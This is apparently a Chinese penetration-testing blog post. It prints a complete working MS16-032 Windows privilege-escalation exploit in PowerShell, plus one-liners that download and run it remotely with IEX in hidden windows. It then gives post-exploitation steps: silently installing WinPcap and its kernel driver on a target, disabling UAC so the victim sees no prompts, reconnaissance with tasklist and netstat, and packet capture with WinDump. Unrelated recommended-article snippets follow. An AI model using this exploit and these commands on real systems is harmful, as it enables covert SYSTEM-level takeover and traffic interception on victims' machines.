MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包

0x01 MS16-023提权

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c start cmd /k echo Hello, World!'"

从远程下载执行一个PowerShell脚本，并新开一个System权限的窗口。

(虚拟机调成2个CPU及以上，才能运行成功）

也可以自己修改PowerShell脚本，在最前两行修改命令。

powershell -nop -ep bypass -File MS16-023.ps1

#=================修改此处命令==================#

$Application = "cmd.exe"

$Commandline = "/c start cmd /k echo Hello, World!"

#===============================================#

Add-Type -TypeDefinition @"

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;

[StructLayout(LayoutKind.Sequential)]

public struct PROCESS_INFORMATION

{

public IntPtr hProcess;

public IntPtr hThread;

public int dwProcessId;

public int dwThreadId;

}

[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]

public struct STARTUPINFO

{

public Int32 cb;

public string lpReserved;

public string lpDesktop;

public string lpTitle;

public Int32 dwX;

public Int32 dwY;

public Int32 dwXSize;

public Int32 dwYSize;

public Int32 dwXCountChars;

public Int32 dwYCountChars;

public Int32 dwFillAttribute;

public Int32 dwFlags;

public Int16 wShowWindow;

public Int16 cbReserved2;

public IntPtr lpReserved2;

public IntPtr hStdInput;

public IntPtr hStdOutput;

public IntPtr hStdError;

}

[StructLayout(LayoutKind.Sequential)]

public struct SQOS

{

public int Length;

public int ImpersonationLevel;

public int ContextTrackingMode;

public bool EffectiveOnly;

}

public static class Advapi32

{

[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]

public static extern bool CreateProcessWithLogonW(

String userName,

String domain,

String password,

int logonFlags,

String applicationName,

String commandLine,

int creationFlags,

int environment,

String currentDirectory,

ref STARTUPINFO startupInfo,

out PROCESS_INFORMATION processInformation);

[DllImport("advapi32.dll", SetLastError=true)]

public static extern bool SetThreadToken(

ref IntPtr Thread,

IntPtr Token);

[DllImport("advapi32.dll", SetLastError=true)]

public static extern bool OpenThreadToken(

IntPtr ThreadHandle,

int DesiredAccess,

bool OpenAsSelf,

out IntPtr TokenHandle);

[DllImport("advapi32.dll", SetLastError=true)]

public static extern bool OpenProcessToken(

IntPtr ProcessHandle,

int DesiredAccess,

ref IntPtr TokenHandle);

[DllImport("advapi32.dll", SetLastError=true)]

public extern static bool DuplicateToken(

IntPtr ExistingTokenHandle,

int SECURITY_IMPERSONATION_LEVEL,

ref IntPtr DuplicateTokenHandle);

}

public static class Kernel32

{

[DllImport("kernel32.dll")]

public static extern uint GetLastError();

[DllImport("kernel32.dll", SetLastError=true)]

public static extern IntPtr GetCurrentProcess();

[DllImport("kernel32.dll", SetLastError=true)]

public static extern IntPtr GetCurrentThread();

[DllImport("kernel32.dll", SetLastError=true)]

public static extern int GetThreadId(IntPtr hThread);

[DllImport("kernel32.dll", SetLastError = true)]

public static extern int GetProcessIdOfThread(IntPtr handle);

[DllImport("kernel32.dll",SetLastError=true)]

public static extern int SuspendThread(IntPtr hThread);

[DllImport("kernel32.dll",SetLastError=true)]

public static extern int ResumeThread(IntPtr hThread);

[DllImport("kernel32.dll", SetLastError=true)]

public static extern bool TerminateProcess(

IntPtr hProcess,

uint uExitCode);

[DllImport("kernel32.dll", SetLastError=true)]

public static extern bool CloseHandle(IntPtr hObject);

[DllImport("kernel32.dll", SetLastError=true)]

public static extern bool DuplicateHandle(

IntPtr hSourceProcessHandle,

IntPtr hSourceHandle,

IntPtr hTargetProcessHandle,

ref IntPtr lpTargetHandle,

int dwDesiredAccess,

bool bInheritHandle,

int dwOptions);

}

public static class Ntdll

{

[DllImport("ntdll.dll", SetLastError=true)]

public static extern int NtImpersonateThread(

IntPtr ThreadHandle,

IntPtr ThreadToImpersonate,

ref SQOS SecurityQualityOfService);

}

"@

function Get-ThreadHandle {

# StartupInfo Struct

$StartupInfo = New-Object STARTUPINFO

$StartupInfo.dwFlags = 0x00000101 # STARTF_USESTDHANDLES

$StartupInfo.wShowWindow = 0;

$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()

$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()

$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()

$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size

# ProcessInfo Struct

$ProcessInfo = New-Object PROCESS_INFORMATION

# CreateProcessWithLogonW --> lpCurrentDirectory

$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED

$CallResult = [Advapi32]::CreateProcessWithLogonW(

"user", "domain", "pass",

0x00000002, "C:\Windows\System32\notepad.exe", "",

0x00000004, $null, $GetCurrentPath,

[ref]$StartupInfo, [ref]$ProcessInfo)

# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS

$lpTargetHandle = [IntPtr]::Zero

$CallResult = [Kernel32]::DuplicateHandle(

$ProcessInfo.hProcess, 0x4,

[Kernel32]::GetCurrentProcess(),

[ref]$lpTargetHandle, 0, $false,

0x00000002)

# Clean up suspended process

$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)

$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)

$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)

$lpTargetHandle

}

function Get-SystemToken {

echo "`n[?] Trying thread handle: $Thread"

echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"

$CallResult = [Kernel32]::SuspendThread($Thread)

if ($CallResult -ne 0) {

echo "[!] $Thread is a bad thread, moving on.."

Return

} echo "[+] Thread suspended"

echo "[>] Wiping current impersonation token"

$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)

if (!$CallResult) {

echo "[!] SetThreadToken failed, moving on.."

$CallResult = [Kernel32]::ResumeThread($Thread)

echo "[+] Thread resumed!"

Return

}

echo "[>] Building SYSTEM impersonation token"

# SecurityQualityOfService struct

$SQOS = New-Object SQOS

$SQOS.ImpersonationLevel = 2 #SecurityImpersonation

$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)

# Undocumented API's, I like your style Microsoft ;)

$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)

if ($CallResult -ne 0) {

echo "[!] NtImpersonateThread failed, moving on.."

$CallResult = [Kernel32]::ResumeThread($Thread)

echo "[+] Thread resumed!"

Return

}

$script:SysTokenHandle = [IntPtr]::Zero

# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE

$CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)

if (!$CallResult) {

echo "[!] OpenThreadToken failed, moving on.."

$CallResult = [Kernel32]::ResumeThread($Thread)

echo "[+] Thread resumed!"

Return

}

echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"

echo "[+] Resuming thread.."

$CallResult = [Kernel32]::ResumeThread($Thread)

}

# main() <--- ;)

$ms16032 = @"

__ __ ___ ___ ___ ___ ___ ___

| V | _|_ | | _|___| |_ |_ |

| |_ |_| |_| . |___| | |_ | _|

|_|_|_|___|_____|___| |___|___|___|

[by b33f -> @FuzzySec]

"@

$ms16032

# Check logical processor count, race condition requires 2+

echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"

if ($([System.Environment]::ProcessorCount) -lt 2) {

echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"

Return

}

# Create array for Threads & TID's

$ThreadArray = @()

$TidArray = @()

echo "[>] Duplicating CreateProcessWithLogonW handles.."

# Loop Get-ThreadHandle and collect thread handles with a valid TID

for ($i=0; $i -lt 500; $i++) {

$hThread = Get-ThreadHandle

$hThreadID = [Kernel32]::GetThreadId($hThread)

# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray

if ($TidArray -notcontains $hThreadID) {

$TidArray += $hThreadID

if ($hThread -ne 0) {

$ThreadArray += $hThread # This is what we need!

}

}

}

if ($($ThreadArray.length) -eq 0) {

echo "[!] No valid thread handles were captured, exiting!"

Return

} else {

echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"

echo "`n[?] Thread handle list:"

$ThreadArray

}

echo "`n[*] Sniffing out privileged impersonation token.."

foreach ($Thread in $ThreadArray){

# Get handle to SYSTEM access token

Get-SystemToken

echo "`n[*] Sniffing out SYSTEM shell.."

echo "`n[>] Duplicating SYSTEM token"

$hDuplicateTokenHandle = [IntPtr]::Zero

$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)

# Simple PS runspace definition

echo "[>] Starting token race"

$Runspace = [runspacefactory]::CreateRunspace()

$StartTokenRace = [powershell]::Create()

$StartTokenRace.runspace = $Runspace

$Runspace.Open()

[void]$StartTokenRace.AddScript({

Param ($Thread, $hDuplicateTokenHandle)

while ($true) {

$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)

}

}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)

$AscObj = $StartTokenRace.BeginInvoke()

echo "[>] Starting process race"

# Adding a timeout (10 seconds) here to safeguard from edge-cases

$SafeGuard = [diagnostics.stopwatch]::StartNew()

while ($SafeGuard.ElapsedMilliseconds -lt 10000) {

# StartupInfo Struct

$StartupInfo = New-Object STARTUPINFO

$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size

$StartupInfo.dwFlags = 0x00000101 # STARTF_USESTDHANDLES

$StartupInfo.wShowWindow = 0;

# ProcessInfo Struct

$ProcessInfo = New-Object PROCESS_INFORMATION

# CreateProcessWithLogonW --> lpCurrentDirectory

$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED

$CallResult = [Advapi32]::CreateProcessWithLogonW(

"user", "domain", "pass",

0x00000002, $Application,$Commandline,

0x00000004, $null, $GetCurrentPath,

[ref]$StartupInfo, [ref]$ProcessInfo)

#---

# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.

#---

# Missing this check used to cause the exploit to fail sometimes.

# If CreateProcessWithLogon fails OpenProcessToken won't succeed

# but we obviously don't have a SYSTEM shell :'( . Should be 100%

# reliable now!

#---

if (!$CallResult) {

continue

}

$hTokenHandle = [IntPtr]::Zero

$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)

# If we can't open the process token it's a SYSTEM shell!

if (!$CallResult) {

echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"

$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)

$StartTokenRace.Stop()

$SafeGuard.Stop()

Return

}

# Clean up suspended process

$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)

$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)

$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)

}

# Kill runspace & stopwatch if edge-case

$StartTokenRace.Stop()

$SafeGuard.Stop()

}

C++版的地址在：

https://www.exploit-db.com/exploits/39574

但总卡死在CreateProcessWithLogonW函数上，无法正常执行。

前3个参数user、domain、pass可以随便写 L"xxx"

LOGON_NETCREDENTIALS_ONLY, //第四个参数

第五、六个参数自定两个wchar_t 数组指针，装目标application名和cmd命令

CREATE_SUSPENDED,//第七个参数

NULL,//第八个参数

第九个参数是当前路径

第10、11个参数是两个结构体指针，需要在前边定义

同时还需要考虑对方机器上的vc++运行库版本。

wmic查看已安装程序：

wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_Product

隐藏提权过程窗口、成功后自动关闭旧cmd.exe的命令：

powershell -nop -ep bypass -windowstyle hidden -File MS16-032.ps1 & exit

powershell -nop -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c start cmd /k echo Hello, World!'" & exit

这样执行，会看到立马窗口消失，执行完命令也不会有进程停留。

0x02 静默安装WinPcap

使用WinDump抓包或者wireshark都需要安装WinPcap，希望它不需要点击即可安装。

我已用sandbox沙盒提取了它安装包释放的文件位置，在和目标相同环境的机子上安装后，提取文件即可：

1、释放dll和sys文件

结构

按照这样的结构，把文件放好到目标机中，主要是Windows目录下的东西，一样也不能少。

2、注册服务

如果就这样执行winDump，会提示分配空间不足的问题，需要注册服务

sc的格式很奇怪，只能等号后有空格，请完全按照此行复制。

sc create npf binPath= "System32\drivers\npf.sys" type= "kernel" start= "auto" error= "normal" tag= "no" DisplayName= "NetGroup Packet Filter Driver"

sc start npf

接下来就可以正常使用WinDump了。

0x03 关于用户以及关闭UAC

1、关于Administrator用户

administrator本来是空密码的，且未激活的，在控制面板中无法对这个用户修改，用runas也无法登录空密码用户。

如果一定要让这个用户出现，作为其他用户一样，可以在欢迎界面登录使用：

net user administrator /active:yes

可以为它修改密码后，再runas使用，但会在欢迎界面看到多出来这个账户

runas /user:administrator cmd

就是以administrator身份打开一个cmd窗口

2、UAC访问控制

防止让渗透目标弹窗，注意以下命令，需administrator或system权限，且重启后生效！

关闭UAC：

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

开启UAC：

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

重启后生效！

3、抓包前的其他信息收集

tasklist /SVC /FO TABLE

用来列出进程对应的服务

tasklist /V /FO CSV >> C:\1.csv

把进程的详细信息导出到csv中，方便程序处理。

tasklist /V /FO list

则比较方便观看。

netstat /r

显示网卡接口列表、路由表。

netstat /abno

进程、PID、内外地址端口、连接状态。

netstat -anp | grep sshd

Linux下的监测ssh连接情况命令

top -d 3

Linux下动态3秒一次刷新，监测资源

http://www.microsoft.com/en-us/download/details.aspx?id=4865

在自己的电脑可以安装微软的 Microsoft Network Monitor3.4

比wireshark强的功能是，可以方便的在左侧列出进程，进程下的几个网络会话，并查看数据。相当于能看到数据的性能管理器网络功能。

本机监控还可以用Process Hacker

看进程运行账户、进程父子关系、dll对磁盘的读写、进程加载的dll列表，都很方便。

0x04 C++调用api获取端口与进程的对应

可以根据端口找进程，也可以根据进程找端口，调用的是底层dll中的函数，直接加载入工程。

原理如下：

https://www.cnblogs.com/BoyXiao/archive/2012/02/20/2359273.html

以下是能直接编译通过的代码demo：

https://blog.csdn.net/change518/article/details/7473475

可以自己定制，实现持续记录netstat信息。

0x05 WinDump使用

整体而言，先写参数，所有参数写完，最后跟上过滤语句即可。

windump -D

大写的D，列出来当前网络接口

windump -i 2

选择第2个网络接口并进行监听

windump -i 2 -l

小写的L，可以实时看到每条数据表的收发端口、地址

windump -i 2 -v

实时输出数据包信息，和-l类似

但是希望更详细可以-vv -vvv

windump -i 2 -X

大写的X参数，输出每个包的详细Ascii / Hex 显示

windump -i 2 -X ip host 127.0.0.1

或者 ip src或者 ip dst用来过滤ip

写成192.168.1也可以过滤整个网段

windump -i 2 -X ip host 127.0.0.1 && port 80,443

限定端口，逗号隔开即可

windump -i 2 -c 5 -C 1

-c 5表示只接受5个包就停止

-C 1表示接受到1MB就停止

windump -i 2 -c 10 -s 2000 -w 1.pcap

-s 2000表示每个包读2000字节，实际一个包一般1400+

不设此参数，每个包都抓不全

-w 1.pcap就是保存的文件名

所以，最终：

WinDump.exe -i 3 -X -s 2000 -C 10 -c 1000 -w 1.pcap port 443

你可能感兴趣的:(MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包)

华为云全栈可观测平台（APM）8月新功能特性华为云PaaS服务小智华为云
华为云应用性能管理服务（ApplicationPerformanceManagement，简称APM）帮助运维人员快速发现应用的性能瓶颈，以及故障根源的快速定位，为用户体验保驾护航。您无需修改代码，只需为应用安装一个APMAgent，就能够对该应用进行全方位监控，帮助您快速定位出错接口和慢接口、重现调用参数、发现系统瓶颈，从而大幅提升线上问题诊断的效率。8月APM更新了3大新特性，一起来看看吧！（
Linux shell sed 命令详解 BugBear1989
详细的sed命令详解，请参考https://my.oschina.net/u/3908182/blog/1921761一、sed命令工作机制：每次读取一行文本至“模式空间(patternspace)”中，在模式空间中完成处理；将处理结果输出至标准输出设备；语法：sed[OPTION]...{script}[input-file]...参数说明-r支持扩展正则表达式-n静默模式-escript1-e
Linux学习-模拟容器网络丢爸 Linux linux 学习
注：在Rocky8.6中使用brctl命令需安装需要下载源码编译安装，下载地址模拟容器间网络通信处在不同namespace的容器网络可以通过vethpair与bridge相连的方式来相互打通#添加虚拟网桥[root@es1~]#brctladdbrbr0[root@es1~]#iplinksetbr0up#创建ns0命名空间，添加IP，并将接口连接到虚拟网桥上[root@es1~]#ipnetns
aiohttp: AttributeError: ‘NoneType‘ object has no attribute ‘get_extra_info‘ zzzzls~ Python python aiohttp asyncio
使用Proxyman分析aiohttp请求时遇到如上错误:报错环境系统:macPython:Python3.8.11aiohttp:3.8.0抓包软件:Proxyman解决方案:修改***/python3.8/site-packages/aiohttp/connector.py1211行:#注释如下行#runtime_has_start_tls=self._loop_supports_start_
Holoviews 创建复杂的可视化布局步入烟尘 Python超入门指南全册 Holoviews python
如何使用Holoviews创建复杂的可视化布局在数据科学和数据可视化领域，Holoviews是一个非常强大的Python库，它可以帮助我们轻松地创建各种复杂的可视化布局。Holoviews提供了一个高层次的接口，使得创建交互式和静态可视化变得简单而直观。本文将介绍如何使用Holoviews来创建复杂的可视化布局，让你的数据以最直观的方式展现出来。安装Holoviews首先，确保你已经安装了Holo
01-Flink安装部署及入门案例（仅供学习），音视频时代你还不会NDK开发小猪佩琪962 2024年程序员学习 flink 学习大数据
先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！因此收集整理了一份《2024年最新大数据全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵
Gitbook 本地安装教程 simple哇书籍 gitbook
Gitbook本地安装教程安装node[nodejs的v10.21.0版本，下载地址：https://nodejs.org/dist/v10.21.0/node-v10.21.0-x64.msi]其他版本有问题npmnpminstall-ggitbook-cligitbookinit[初始化目录结构]gitbookbuild[编译]gitbookserve[运行]插件在根目录新建book.json
pip list 出现error BenjaminY
------------问题描述--------------更新到pip19.0.1原来piplist可以正常使用并且返回各个package安装版本又强制安装了一个package的版本然后piplist报了一大堆错，并且pycharm里也看不到包。问题总结为：就是因为强制安装了两个版本生成了一个‘-’开头的文件夹这个文件夹里面没有METADATA这个文件-----------解决方法-------
pandas读取带有表头的数据文件，读取无表头的数据文件小桥流水---人工智能人工智能深度学习 Python程序代码 pandas
在Python中使用pandas库读取数据时，常见的问题之一就是如何处理数据文件中的表头。1.引入pandas库在开始之前，我们首先需要导入pandas库。如果你的环境中还未安装pandas，可以使用pip安装：pipinstallpandas导入pandas库：importpandasaspd2.读取带有表头的数据文件当数据文件中包含表头时，pandas会默认将第一行数据作为DataFrame的
class-dump 安装和使用奋斗的小马达
安装我的硬件环境环境：macOSHighSierra10.13.4Xcode9.3.1class-dump下载地址：https://link.jianshu.com/?t=http://stevenygard.com/projects/class-dump/1，终端输入mkdir~/bin，在当前用户根目录下创建一个bin目录。2，把下载下来的dmg打开，复制文件里面的class-dump到创建的
淘宝购物怎么拿返利，淘宝购物佣金最高的软件高省APP大九
淘宝作为中国最大的电商平台，每天都有数以亿计的交易在这里发生。对于大多数消费者来说，如何在购物时获取更多的优惠和返利，无疑是一个值得探讨的话题。高省APP作为一款专注于购物返利的软件，为淘宝购物者提供了一个便捷、高效的返利渠道。本文将详细介绍如何通过高省APP在淘宝购物时获取返利。高省APP官网邀请码110000一、下载并注册高省APP首先，你需要在手机应用商店搜索“高省”并下载安装。安装完成后，
Conda创建环境失败：000和404错误柚柚柚柚柚 conda
一、首先下载Anaconda1.打开网址Indexof/anaconda/archive/|清华大学开源软件镜像站|TsinghuaOpenSourceMirror，滑到最底部，下载Anaconda3-5.3.1-Linux-x86_64.sh。2.使用winscp拖动本地的Anaconda3-5.3.1-Linux-x86_64.sh到服务器的个人工作目录下。二、安装Anaconda软件，创建虚
3. 部署Fabric2.2 集群（使用官方Demo）明神特烦恼 Fabric2.2 全面学习 fabric 区块链部署
我们将一步一步搭建Fabric2.2版本的区块链网络，从0开始搭建服务器环境、到运行官方Demo集群、创建通道、安装合约，以及从零完成基于区块链的农产品溯源项目开发。适用于无区块链开发经验的朋友们，已经有经验的请绕行。上节作者新购买云服务器，并且安装docker以及docker-compose，接下来作者与大家一起操作，不遗漏每个操作步骤（之前有一些同学操作结果出现错误，大多数是步骤有遗漏），保证
Python安装NumPy 0阿齐兹0 阿齐兹的PyCV学习笔记 python numpy
打开cmd通过python和pip安装：C:\"ProgramFiles"\Python36\python.exe-mpipinstall--usernumpyscipymatplotlibipythonjupyterpandassympynose参考资料：https://www.scipy.org/install.html
python numpy安装步骤-NumPy 安装编程大乐趣
NumPy安装Python官网上的发行版是不包含NumPy模块的。我们可以使用以下几种方法来安装。1、使用已有的发行版本对于许多用户，尤其是在Windows上，最简单的方法是下载以下的Python发行版，它们包含了所有的关键包（包括NumPy，SciPy，matplotlib，IPython，SymPy以及Python核心自带的其它包）：Anaconda:免费Python发行版，用于进行大规模数据
SpringBoot整合H2数据库并将其打包成jar包、转换成exe文件暗雪之格 Spring spring boot 数据库 jar java-ee
SpringBoot整合H2数据库并将其打包成jar包、转换成exe文件H2是一个用Java开发的嵌入式数据库，它的主要特性使其成为嵌入式应用程序的理想选择。H2仅是一个类库，可以直接嵌入到应用项目中，而无需独立安装客户端和服务器端。常用开源数据库常用的开源数据库包括H2、Derby、HSQLDB、MySQL和PostgreSQL。相比之下，H2和HSQLDB非常适合作为嵌入式数据库使用，而其他数
Tableau Prep 2018.3.1 用 PDF 连接器准备数据！阿达_优阅达
数据准备的过程可能会很复杂，所以，TableauPrep应运而生！通过为你提供简化流程的工具，使数据准备更加简单便捷！近日，在TableauPrep2018.3.1推出了新功能：从现在开始，你可以对Flow中的任何步骤应用任何操作，并跟踪路径中的更改。此外，还支持用于数据库连接的通配符联合选项和用于PDF文件的全新连接器，为你提供更大的灵活性。『更改默认存储库位置』默认情况下，在安装Tableau
如何下载各个版本的tomcat-比如tomcat9 耳边轻语999 tomcat java
1，找到tomcat官网https://tomcat.apache.org/ApacheTomcat®-Welcome!找到tomcat9，或者archives1.1，找到对应版本1.2，找到小版本1.3，找到bin2，Indexof/dist/tomcat/tomcat-9/v9.0.39/bin2.1，下载对应的解压版本或者安装版本
【网络安全 | 渗透工具】IIS 短文件名枚举工具—shortscan安装使用教程秋说渗透工具 web安全漏洞挖掘渗透工具
未经许可，不得转载。文章目录shortscan安装使用Shortutil工具shortscanShortScan是一种用于在MicrosoftIIS(InternetInformationServices)Web服务器上进行短文件名枚举的工具。该工具可以帮助攻击者利用IIS的文件名处理特性，通过预测性扫描枚举服务器上的文件和目录名称。背景：在早期的Windows文件系统（如FAT和NTFS）中，每
WingIDE 6.1.5 设置远程调试汪成心
这其实是参考WingIDE官网的介绍，很多是用谷歌翻译过来的。为远程开发进行SSH设置安装SSH查看SSH服务是不是安装sudops-e|grepssh出现如下界面表示已安装Screenshotfrom2020-02-2915-24-04.png否则使用如下命令安装sudoapt-getinstallopenssh-server生成SSH密钥对在运行WingPro的系统上使用ssh-keygen生
Go gin使用命令安装失败原因，及解决方法大龄Python青年 golang gin 开发语言
Gogin使用命令安装失败明明使用的是golang中的web框架gin文档中的命令来安装gin的，而且是直接复制的，可是为什么会安装失败，并且会提示go:go.modfilenotfoundincurrentdirectoryoranyparentdirectory.这是什么意思呢？大概意思是在当前的工作目录或任一上一级的目录中都没有go.mod文件。goget-ugithub.com/gin-g
Log4j日志脱敏记录一下 IAmZRH JAVA java log4j
前言在项目上线环境中，需要记录程序运行时产生的各种错误信息、状态信息、调试信息、执行时间记录等日志信息。可以用于查找问题、定位数据等等操作。日志的具体实现可以有log4j和logback等，这里我们使用SLF4J作为日志系统的实现。使用SLF4J使用idea工具可以安装lombok插件，并引入maven包：org.projectlomboklombok1.18.4在需要打印日志的类上增加@Slf4
pip版本降级一叶知秋@qqy python
有时候安装python库失败时，总会提示让升级pip，但是说实话，个人不是太喜欢这种方式，因为pip版本太高时，反而会有一些意想不到的结果，因为如果你需要使用非常古老的库，可能还支持的python版本，但是最新版本的pip就不支持了，会找不到，这是可能就会需要将pip版本降级到一个指定的版本。命令python-mpipinstallpip==9.0.3其中，-m参数的解释：runlibrarymo
Python股票数据爬虫 nujiah001 技术总结 stock python
最近再看python的爬虫,刚好有人问到能不能把所有的股票数据爬下来.看一些其他人的实现方式,可能一些网站进行了优化,竟然没有找到能完全直接用的,但得到了很好的思路.简单记录一下,方便以后自己使用.准备工作.安装anaconda.使用jupyter.安装BeautifulSoup,requests包实现步骤:1.得到股票列表defis_stock(href_para): ifhref_parai
如何升级Python环境懒大王爱吃狼 python 开发语言编辑器
要升级Python环境，可以按照以下步骤进行操作：1.首先，确定您当前安装的Python版本。可以在命令行中运行以下命令来检查Python版本：python--version2.访问Python官方网站（https://www.python.org/downloads/）下载最新的Python安装程序。选择与您操作系统兼容的版本。3.运行下载的安装程序，并按照提示进行安装。在安装过程中，确保选择“
通信术语 gelao18sui network access exchange system interface signal
通信类常用的英语词汇（表记录的）插入修改添加删除InsertModify,updateAddDelete（拨号后）拨号音不断Non-stopDialTone（程序,进程）调度Dispatch（程序安装的）序列号SerialNumberSN（单板）不在位Not-in-position（单板等）插入/拔出Plug/Unplug（发货）附件，辅助设备Accessories（话务员）为分机用户代拨外线Di
怎么使用今日头条app赚钱，今日头条变现赚钱的3个方法教程小小编007
今日头条的流量很多，几乎每个人手机都安装了今日头条app，有流量的地方就有商机，很多人自媒体人也在今日头条赚的了第一桶金。那么新人如何通过今日头条赚钱，有哪些变现方法呢？小编收集了以下几个可以在今日头条赚钱的教程，可参考选择。一：文章变现在今日头条可以发布文章，文章的阅读量会折算成相应的阅读奖励，通过这样的方法可以变现。而且如果你的粉丝数比较多，达到一定门槛之后，可以开通包括原创收益，带货等多种权
pip --upgrade批量更新过期的python库 diniushu8825 python shell
今天看了下系统环境，不少python库都有了更新，再用旧版本库可能已经不适合了，就想把所有的库都更新到最新版本。查看系统里过期的python库，可以用pip命令piplist#列出所有安装的库piplist--outdated#列出所有过期的库对于列出的过期库，pip也提供了更新的命令pipinstall--upgrade库名但此命令不支持全局全部库升级。在stackoverflow上有人提供了批
直返APP与其他返利平台相比，有哪些不同之处？日常购物技巧呀
想要下载直返APP，你可以在各大应用商店搜索“直返”并下载安装。无论你是使用的是苹果的AppStore还是安卓的GooglePlay，都能找到直返APP的身影。只需轻轻一点，就能将这款实用的购物工具添加到你的手机中。【高省】APP（高佣金领导者）是一个自用省钱佣金高，分享推广赚钱多的平台，百度有几百万篇报道，运行三年，稳定可靠。高省APP，是2021年推出的平台，0投资，0风险、高省APP佣金更高
DNS主从服务架构（thirteen day）沉迷于学习的网络狗服务器网络运维
回顾编号主机名IP地址说明修改1web服务器192.168.1.11发布部署web服务发布了一个nginxweb服务2DNS服务器192.168.1.22用于解析域名和IP地址1、安装bind2、配置一个conf，zones，zone3、检查了3个文件4、启动3client主机192.168.1.33用于模拟客户机修改dns的访问主机临时修改echo“nameserver192.168.1.22”
多线程编程之join()方法周凡杨 java JOIN 多线程编程线程
现实生活中，有些工作是需要团队中成员依次完成的，这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人，如何保证T2在T1执行完后执行，T3在T2执行完后执行？问题分析：首先问题中有三个实体，T1、T2、T3，因为是多线程编程，所以都要设计成线程类。关键是怎么保证线程能依次执行完呢？ Java实现过程如下： public class T1 implements Runnabl
java中switch的使用 bingyingao java enum break continue
java中的switch仅支持case条件仅支持int、enum两种类型。用enum的时候，不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br
hive having count 不能去重 daizj hive 去重 having count 计数
hive在使用having count()是，不支持去重计数 hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10; FAILED: SemanticExcep
WebSphere对JSP的缓存周凡杨 WAS JSP 缓存
对于线网上的工程，更新JSP到WebSphere后，有时会出现修改的jsp没有起作用，特别是改变了某jsp的样式后，在页面中没看到效果，这主要就是由于websphere中缓存的缘故，这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存，就要找到WAS安装后的根目录。现服务
设计模式总结朱辉辉33 java 设计模式
1.工厂模式 1.1 工厂方法模式 (由一个工厂类管理构造方法) 1.1.1普通工厂模式(一个工厂类中只有一个方法) 1.1.2多工厂模式(一个工厂类中有多个方法) 1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n
实例：供应商管理报表需求调研报告老A不折腾 finereport 报表系统报表软件信息化选型
